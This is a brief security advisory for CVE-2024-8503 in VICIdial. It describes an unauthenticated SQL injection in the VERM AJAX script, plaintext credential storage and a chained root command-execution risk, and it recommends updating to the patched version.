CVE-2024-8503

Name of the Vulnerable Software and Affected Versions VICIdial versions prior to 2.14-917a VICIdial version 2.14-917a

Description An unauthenticated attacker can exploit a time-based SQL injection flaw in VICIdial to retrieve database records. The software, by default, stores credentials in plaintext within the database. An authenticated attacker with agent access can execute arbitrary shell commands as the root user. This root access can be chained with the SQL injection issue to further compromise the system. The vulnerability resides in the VERM AJAX functions.php script due to a lack of protection against SQL injection attacks.

Recommendations VICIdial versions prior to 2.14-917a: Update to version 2.14-917a or later. VICIdial version 2.14-917a: Apply any available updates or patches to address the remote code execution issue.